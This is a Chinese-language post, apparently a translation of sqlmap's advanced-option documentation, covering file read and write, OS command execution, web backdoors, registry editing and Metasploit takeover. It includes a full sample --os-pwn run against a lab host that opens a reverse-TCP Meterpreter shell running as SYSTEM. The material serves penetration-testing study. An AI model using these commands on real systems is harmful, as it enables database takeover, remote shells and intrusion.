希望各位大佬轻喷(QAQ)
首发先知社区:https://xz.aliyun.com/t/3011
其他高级 用户自定义函数注入参数:–udf-inject,–shared-lib
你可以通过编译MySQL注入你自定义的函数(UDFs)或PostgreSQL在windows中共享库,DLL,或者Linux/Unix中共享对象,
sqlmap将会问你一些问题,上传到服务器数据库自定义函数,然后根据你的选择执行他们,当你注入完成后,sqlmap将会移除它们。
系统文件操作从数据库服务器中读取文件
参数:–file-read
当数据库为MySQL,PostgreSQL或Microsoft SQLServer,并且当前用户有权限使用特定的函数。读取的文件可以是文本也可以是二进制文件。
把文件上传到数据库服务器中
参数:–file-write,–file-dest
当数据库为MySQL,PostgreSQL或Microsoft SQLServer,并且当前用户有权限使用特定的函数。上传的文件可以是文本也可以是二进制文件。
运行任意操作系统命令
参数:–os-cmd,–os-shell
当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数。
在MySQL、PostgreSQL,sqlmap上传一个二进制库,包含用户自定义的函数,sys_exec()和sys_eval()。
那么他创建的这两个函数可以执行系统命令。在Microsoft SQLServer,sqlmap将会使用xp_cmdshell存储过程,
如果被禁(在Microsoft SQL Server2005及以上版本默认禁制),sqlmap会重新启用它,如果不存在,会自动创建。
用–os-shell参数也可以模拟一个真实的shell,可以输入你想执行的命令。
当不能执行多语句的时候(比如php或者asp的后端数据库为MySQL时),仍然可能使用INTOOUTFILE写进可写目录,来创建一个web后门。支持的语言:
1、ASP 2、ASP.NET 3、JSP 4、PHPMeterpreter配合使用
参数:–os-pwn,–os-smbrelay,–os-bof,–priv-esc,–msf-path,–tmp-path
当数据库为MySQL,PostgreSQL或Microsoft SQLServer,并且当前用户有权限使用特定的函数,可以在数据库与攻击者直接建立TCP连接,
这个连接可以是一个交互式命令行的Meterpreter会话,sqlmap根据Metasploit生成shellcode,并有四种方式执行它:
1. 通过用户自定义的sys_bineval()函数在内存中执行Metasplit的shellcode,支持MySQL和PostgreSQL数据库,参数:--os-pwn。 2. 通过用户自定义的函数上传一个独立的payload执行,MySQL和PostgreSQL的sys_exec()函数,Microsoft SQL Server的xp_cmdshell()函数,参数:--os-pwn。 3. 通过SMB攻击(MS08-068)来执行Metasploit的shellcode,当sqlmap获取到的权限足够高的时候(Linux/Unix的uid=0,Windows是Administrator),--os-smbrelay。 4. 通过溢出Microsoft SQL Server 2000和2005的sp_replwritetovarbin存储过程(MS09-004),在内存中执行Metasploit的payload,参数:--os-bof列举一个MySQL例子:
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit [...] [hh:mm:31] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2003 web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0 back-end DBMS: MySQL 5.0 [hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system [hh:mm:31] [INFO] the back-end DBMS operating system is Windows how do you want to establish the tunnel? [1] TCP: Metasploit Framework (default) [2] ICMP: icmpsh - ICMP tunneling \> [hh:mm:32] [INFO] testing if current user is DBA [hh:mm:32] [INFO] fetching current user what is the back-end database management system architecture? [1] 32-bit (default) [2] 64-bit \> [hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist [hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist [hh:mm:33] [INFO] detecting back-end DBMS version from its banner [hh:mm:33] [INFO] retrieving MySQL base directory absolute path [hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file [hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file how do you want to execute the Metasploit shellcode on the back-end database underlying operating system? [1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default) [2] Stand-alone payload stager (file system way) \> [hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode which connection type do you want to use? [1] Reverse TCP: Connect back from the database host to this machine (default) [2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535 [3] Bind TCP: Listen on the database host for a connection \> which is the local address? [192.168.136.1] which local port number do you want to use? [60641] which payload do you want to use? [1] Meterpreter (default) [2] Shell [3] VNC \> [hh:mm:40] [INFO] creation in progress ... done [hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait.. \_ \| \| o \_ \_ \_ \_ \_\|\_ \__, , \_ \| \| \_\_ \_\|\_ / \|/ \|/ \| \|/ \| / \| / \\_\|/ \\_\|/ / \\_\| \| \| \| \|_/\|__/\|_/\\_/\|_/ \\/ \|__/ \|__/\\__/ \|_/\|_/ /\| \\\| =[ metasploit v3.7.0-dev [core:3.7 api:1.0] \+ -- --=[ 674 exploits - 351 auxiliary \+ -- --=[ 217 payloads - 27 encoders - 8 nops =[ svn r12272 updated 4 days ago (2011.04.07) PAYLOAD =\> windows/meterpreter/reverse_tcp EXITFUNC =\> thread LPORT =\> 60641 LHOST =\> 192.168.136.1 [\*] Started reverse handler on 192.168.136.1:60641 [\*] Starting the payload handler... [hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait.. [\*] Sending stage (749056 bytes) to 192.168.136.129 [\*] Meterpreter session 1 opened (192.168.136.1:60641 -\> 192.168.136.129:1689) at Mon Apr 11 hh:mm:52 +0100 2011 meterpreter \> Loading extension espia...success. meterpreter \> Loading extension incognito...success. meterpreter \> [-] The 'priv' extension has already been loaded. meterpreter \> Loading extension sniffer...success. meterpreter \> System Language : en_US OS : Windows .NET Server (Build 3790, Service Pack 2). Computer : W2K3R2 Architecture : x86 Meterpreter : x86/win32 meterpreter \> Server username: NT AUTHORITY\\SYSTEM meterpreter \> ipconfig MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 Intel(R) PRO/1000 MT Network Connection Hardware MAC: 00:0c:29:fc:79:39 IP Address : 192.168.136.129 Netmask : 255.255.255.0 meterpreter \> exit [\*] Meterpreter session 1 closed. Reason: User exit默认情况下MySQL在Windows上以SYSTEM权限运行,PostgreSQL在Windows与Linux中是低权限运行,
Microsoft SQL Server 2000默认是以SYSTEM权限运行与2008大部分是以NETWORK SERVICE有时是LOCAL SERVICE。
对Windows注册表操作当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前web应用支持堆查询。当然,当前连接数据库的用户也需要有权限操作注册表。
读取注册表值参数:–reg-read
写入注册表值参数:–reg-add
删除注册表值参数:–reg-del
注册表辅助选项参数:–reg-key,–reg-value,–reg-data,–reg-type